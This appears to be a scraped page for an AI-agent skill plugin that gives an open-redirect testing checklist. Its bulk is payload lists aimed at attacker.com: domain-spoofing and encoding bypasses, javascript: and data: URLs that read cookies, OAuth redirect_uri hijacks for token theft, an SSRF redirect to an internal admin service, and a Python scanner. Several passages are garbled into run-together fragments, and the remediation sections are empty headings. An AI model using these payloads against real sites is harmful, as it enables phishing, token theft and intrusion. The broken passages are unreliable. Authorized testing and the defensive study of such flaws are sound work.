Stats
Actions
Tags
From cybersec-toolkit
Provides a checklist for open redirect vulnerability testing: parameter identification, bypass techniques (URL encoding, CRLF injection), and chaining with OAuth/SSRF. For authorized security research.
How this skill is triggered — by the user, by Claude, or both
Slash command
/cybersec-toolkit:offensive-open-redirectThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
- **Skill Name**: open-redirect
Open redirect vulnerability checklist: parameter identification, bypass techniques (URL encoding, double slashes, CRLF injection, protocol handlers), chaining with OAuth/SSRF, and impact escalation paths. Use for web app testing and bug bounty open redirect discovery.
Use this skill when the conversation involves any of:
open redirect, URL redirect, redirect bypass, URL encoding bypass, CRLF, protocol handler, redirect chain, OAuth redirect, SSRF chain, open redirection
When this skill is active:
Open redirect vulnerabilities occur when web applications improperly validate user-supplied URLs used for redirections. These vulnerabilities allow attackers to craft links that appear legitimate but redirect victims to malicious websites. When exploited, the victim initially connects to a trusted domain, giving the malicious link an appearance of legitimacy, before being redirected to an attacker-controlled destination.
sequenceDiagram
participant Victim
participant TrustedSite
participant AttackerSite
Victim->>TrustedSite: Click malicious link<br/>trusted.com/redirect?url=evil.com
Note over TrustedSite: Inadequate URL validation
TrustedSite->>Victim: HTTP 302 Redirect to evil.com
Victim->>AttackerSite: Automatic redirect
AttackerSite->>Victim: Malicious content
The core technical flaws leading to open redirects include:
javascript: navigations from cross-origin contexts more, but many apps forward redirects to clients; validate server-side before emitting 3xx.redirect_uri match; test for partial/path-only allowlists and case/encoding mismatches.intent: URLs on Android and iOS universal link fallbacks.SameSite=Lax default affects redirect flows; test authentication state preservationno-referrer or strict-origin may break redirect detection; test logging/analytics dependenciesOpen redirects can exist in various implementation patterns:
?redirect=, ?url=, ?next=)/redirect/https://example.com)Identify Redirection Parameters:
redirect, redirect_to, url, link, goto, return, returnTo, destination,
next, checkout, checkout_url, continue, return_path, return_url,
forward, path, redir, redirect_uri, view, img_url, image_url, load_url
Find Redirection Endpoints:
Search Code and Documentation:
Basic Open Redirect Testing:
https://target.com/redirect?url=https://attacker.com
https://target.com/redirect?next=https://attacker.com
https://target.com/redirect?url=//attacker.com
https://target.com/redirect?url=/../redirect?url=https://attacker.com
Referer-Based Open Redirect Testing:
OAuth Redirect Testing:
https://target.com/oauth/authorize?client_id=CLIENT_ID&redirect_uri=https://attacker.com
graph TD
subgraph "Open Redirect Bypass Techniques"
A[Validation Bypasses] --> B[Domain Spoofing]
A --> C[Encoding Bypasses]
A --> D[Protocol Confusion]
A --> E[Path-Based Bypasses]
A --> F[Special Character Abuse]
B --> B1["target.com.attacker.com"]
B --> B2["attacker.com?target.com"]
C --> C1["URL Encoding: %68%74%74%70%73..."]
C --> C2["Double Encoding"]
D --> D1["javascript:alert(1)"]
D --> D2["data:text/html;base64,..."]
E --> E1["////attacker.com"]
E --> E2["/\/attacker.com"]
F --> F1["[email protected]"]
F --> F2["attacker.com#target.com"]
end
https://target.com/redirect?url=https://target.com.attacker.com
https://target.com/redirect?url=https://attacker.com?target.com
https://target.com/redirect?url=https://attackertarget.com
%252F style bypass.https://target.com/redirect?url=https%3A%2F%2Fattacker.com
https://target.com/redirect?url=%68%74%74%70%73%3a%2f%2f%61%74%74%61%63%6b%65%72%2e%63%6f%6d
https://target.com/redirect?url=javascript:alert(document.domain)
https://target.com/redirect?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
https://target.com/redirect?url=https;/attacker.com
https://target.com/redirect?url=/\/attacker.com
https://target.com/redirect?url=////attacker.com
https://target.com/redirect?url=\/\/attacker.com/
https://target.com/redirect?url=https://[email protected]
https://target.com/redirect?url=https://attacker.com#target.com
https://target.com/redirect?url=https://attacker.com\@target.com
Framework Redirector Vulnerabilities:
url parameter
/spring/login?url=https://attacker.com
redirect() helper
/redirect?url=https://attacker.com
res.redirect() calls
/login?redirect=https://attacker.com
// Test Server Action redirect injection
/api/action?redirect=https://attacker.com
goto() and redirect() manipulation
// Test in hooks.server.ts
/auth/callback?redirectTo=https://attacker.com
/login?redirectTo=https://attacker.com
/api/redirect?url=https://attacker.com
OAuth Implementation Vulnerabilities:
redirect_uri
/oauth/authorize?response_type=token&redirect_uri=https://attacker.com
state parameter handling
/oauth/callback?code=ABC123&state=https://attacker.com
Social Login Vulnerabilities:
/login/facebook/callback?return_url=https://attacker.com
/auth/google/callback?redirect_uri=https://attacker.com
graph LR
subgraph "Open Redirect Impact Scenarios"
A[Open Redirect] --> B[Phishing Attacks]
A --> C[CSRF Augmentation]
A --> D[Advanced Attack Chains]
B --> B1[Domain Credibility Abuse]
B --> B2[Context-Aware Phishing]
C --> C1[Redirect Chaining]
C --> C2[Login CSRF]
D --> D1[XSS via Redirect]
D --> D2[SSRF via Redirect]
D --> D3[OAuth Token Theft]
end
https://target.com/redirect?url=javascript:alert(document.cookie)
https://target.com/redirect?url=http://internal-service/admin
import requests
from urllib.parse import urlparse
def test_open_redirect(target_url, redirect_param, payloads):
for payload in payloads:
test_url = f"{target_url}{redirect_param}={payload}"
try:
# Disable redirects to manually check
response = requests.get(test_url, allow_redirects=False, timeout=10)
if response.status_code in [301, 302, 303, 307, 308]:
location = response.headers.get('Location', '')
parsed = urlparse(location)
if parsed.netloc and parsed.netloc not in target_domain:
print(f"Potential Open Redirect: {test_url} -> {location}")
except Exception as e:
print(f"Error testing {test_url}: {e}")
# Target website
target_url = "https://target.com/redirect?"
target_domain = "target.com"
redirect_param = "url"
# Common bypass payloads
payloads = [
"https://attacker.com",
"//attacker.com",
"https%3A%2F%2Fattacker.com",
"/\/attacker.com",
"https://[email protected]",
"https://target.com.attacker.com",
"javascript:alert(document.domain)"
]
test_open_redirect(target_url, redirect_param, payloads)
flowchart TD
A[Open Redirect Testing Strategy] --> B[Discovery Phase]
A --> C[Initial Testing]
A --> D[Bypass Testing]
A --> E[Exploitation]
A --> F[Documentation]
B --> B1[Map redirect functionality]
B --> B2[Identify parameters]
B --> B3[Review source code]
C --> C1[Test basic payloads]
C --> C2[Observe behavior]
D --> D1[Test domain validation bypasses]
D --> D2[Test encoding bypasses]
E --> E1[Create PoC exploits]
E --> E2[Chain with other vulnerabilities]
F --> F1[Document vulnerable endpoints]
F --> F2[Note successful bypasses]
Discovery Phase:
Initial Testing Phase:
?redirect=https://attacker.com
?redirect=//attacker.com
?redirect=\/\/attacker.com
Bypass Testing Phase:
Exploitation Phase:
Documentation Phase:
https://attacker.com//attacker.com%68%74%74%70%73%3a%2f%2f%61%74%74%61%63%6b%65%72%2e%63%6f%6dImplement Proper Validation:
Use Indirect References:
Implement Safe Redirect Patterns:
Technical Controls:
npx claudepluginhub 26zl/cybersec-toolkit --plugin cybersec-toolkitTests open redirect vulnerabilities by analyzing URL parameters, applying bypass techniques, and chaining exploits for phishing and token theft.
Identifies and tests open redirect vulnerabilities in web apps by analyzing URL parameters, bypass techniques like encoding and subdomain tricks, and phishing exploitation chains. Useful for login, OAuth, and SSO audits.
Identifies and tests open redirect vulnerabilities in web apps by analyzing URL parameters, bypass techniques like encoding and subdomain tricks, and phishing exploitation chains. Useful for login, OAuth, and SSO audits.